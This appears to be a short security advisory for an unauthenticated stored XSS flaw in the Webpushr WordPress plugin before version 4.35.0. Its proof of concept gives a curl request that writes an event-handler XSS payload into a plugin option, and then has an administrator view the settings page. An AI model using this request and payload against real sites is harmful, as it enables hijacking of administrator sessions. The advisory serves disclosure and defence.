Webpushr < 4.35.0 - Unauthenticated Stored XSS

Description The plugin does not prevent visitors on the site from changing some of the plugin options, some of which may be used to conduct Stored XSS attacks.

PoC

1. Woocommerce needs to be installed as well as activating webpushr-web-push-notifications by creating an account. 2. Run the following curl request: curl --url ‘http://vulnerable-site.tld/wp-admin/admin-post.php’ --data ‘save_woo_settings=1&webpushr;_price_drop=1&webpushr;_woo_price_drop_icon="+style=animation-name:rotation;display:block+onanimationstart=alert(/XSS/)+x’ 3. Have an administrator browse the price drop notification settings: http://vulnerable-site.tld/wp-admin/admin.php?page=webpushr-configuration&amp;menu;=price_drop#woocommerce_settings